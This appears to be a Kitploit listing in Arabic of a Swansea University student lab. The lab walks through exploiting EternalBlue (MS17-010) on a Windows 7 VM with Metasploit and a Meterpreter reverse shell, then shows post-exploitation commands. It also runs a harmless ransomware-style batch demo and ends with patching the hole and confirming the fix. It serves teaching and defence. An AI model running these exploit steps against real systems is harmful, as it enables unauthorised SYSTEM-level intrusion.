Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — معمل أمن سيبراني يوضح استغلال CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد جهاز افتراضي يعمل بنظام Windows 7 ضعيف، مع تحقيق وصول على مستوى SYSTEM عبر Meterpreter. يشمل سلسلة الهجوم الكاملة، وما بعد الاستغلال، والتخفيف عبر تصحيح MS17-010، تم اختباره في بيئة معملية أخلاقية معزولة. | Kitploit
أدوات/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
تصعيد الامتيازاتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالتحليل البرمجيات الخبيثةاختبار الاختراقالقيادة والسيطرةالتعلم والتعليم

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

الاستجابة للحوادث
مختبرات وتدريب عملي
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

معمل أمن سيبراني يوضح استغلال CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد جهاز افتراضي يعمل بنظام Windows 7 ضعيف، مع تحقيق وصول على مستوى SYSTEM عبر Meterpreter. يشمل سلسلة الهجوم الكاملة، وما بعد الاستغلال، والتخفيف عبر تصحيح MS17-010، تم اختباره في بيئة معملية أخلاقية معزولة.

مشاركة

عرض توضيحي لاستغلال ثغرة EternalBlue (MS17-010)

مختبر أمن سيبراني يوضح استغلال ثغرة CVE-2017-0144 (EternalBlue) باستخدام Metasploit ضد نظام Windows 7 ضعيف، مع تحقيق وصول على مستوى SYSTEM عبر Meterpreter.

يحاكي هذا المشروع أيضًا هجوم فدية على غرار WannaCry (عرض توضيحي آمن) ويوضح التخفيف باستخدام التصحيح الأمني MS17-010.


معلومات الوحدة

الوحدة: CSCM828 نقاط الضعف الأمنية واختبار الاختراق

الطلاب:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

الجامعة: Swansea University


الموارد والتنزيلات

  1. MS17-010 EternalBlue SMB إفساد تجمع نواة Windows البعيد
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (تحديث أمان Windows 7 x64)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (تنزيل الأجهزة الافتراضية)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 Home Premium English x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. نظرة عامة

يوضح هذا المختبر:

  • استغلال عن بعد لثغرة SMB (MS17-010)
  • وصول على مستوى النواة عبر EternalBlue
  • إنشاء جلسة Meterpreter
  • تقنيات ما بعد الاستغلال
  • محاكاة فدية على غرار WannaCry (آمنة)
  • التخفيف من خلال التصحيح

2. بيئة المختبر

المتطلبات

  • VMware Workstation / VirtualBox
  • 8GB RAM كحد أدنى

الجهاز المهاجم

  • Kali Linux
  • Metasploit Framework

الجهاز الضحية

  • Windows 7 SP1 x64 (غير محدث)

الشبكة

  • مضيف فقط / NAT (بيئة معزولة)
  • تأكد من قدرة الجهازين على التواصل

⚠️ يجب إجراء هذا المختبر في بيئة معزولة تمامًا.


3. إعداد الضحية (Windows 7)

تشغيل في موجه الأوامر كمسؤول:

تعطيل جدار الحماية

root@kitploit:~
netsh advfirewall set allprofiles state off

التحقق من منفذ SMB

root@kitploit:~
netstat -an | findstr :445

تعطيل التحديثات (لاستقرار المختبر)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. إعداد المهاجم (Kali Linux)

التحقق من الاتصال

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. خطوات الاستغلال

الخطوة 1: مسح الهدف

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

المتوقع:

  • المضيف VULNERABLE

الخطوة 2: تشغيل الاستغلال

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

الخطوة 3: تأكيد الوصول

root@kitploit:~
meterpreter > getuid

المتوقع:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. ما بعد الاستغلال

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

الترحيل المستقر

root@kitploit:~
ps
migrate <explorer.exe PID>

7. محاكاة WannaCry (عرض توضيحي آمن)

إنشاء الحمولة (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

الرفع والتنفيذ

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. التخفيف (عرض التصحيح)

الخطوة 1: تنزيل التصحيح

  • زر: https://www.catalog.update.microsoft.com/
  • ابحث: KB4012212 Windows 7 x64
  • قم بتنزيل ملف .msu

الخطوة 2: تثبيت التصحيح

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

الخطوة 3: إعادة التشغيل

root@kitploit:~
shutdown /r /t 0

الخطوة 4: التحقق من التصحيح

root@kitploit:~
systeminfo | findstr KB4012212

الخطوة 5: إعادة تشغيل الاستغلال

المتوقع:

  • فشل الاستغلال
  • لا توجد جلسة Meterpreter

الخطوة 6: التحقق باستخدام Nmap

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

المتوقع:

  • NOT VULNERABLE

9. استكشاف الأخطاء وإصلاحها

المشكلةالحل
فشل الاستغلالتحقق من الاتصال
لا توجد جلسةتعطيل جدار الحماية
انتهاء الجلسةأعد تشغيل الاستغلال
لا تظهر نافذةالترحيل إلى explorer.exe

10. الاعتبارات الأخلاقية

يتم تنفيذ هذا المشروع:

  • على أجهزة مختبر خاضعة للتحكم فقط
  • في شبكة معزولة تمامًا
  • لأغراض تعليمية فقط

الاستخدام غير المصرح به ينتهك:

  • قانون إساءة استخدام الحاسوب في المملكة المتحدة (UK Computer Misuse Act 1990)

11. الخاتمة

يوضح هذا المختبر:

  • استغلال SMB في العالم الحقيقي باستخدام EternalBlue
  • اختراق على مستوى SYSTEM لنظام Windows 7
  • محاكاة هجوم فدية (آمنة)
  • أهمية التصحيح في الوقت المناسب
تنزيل الأداة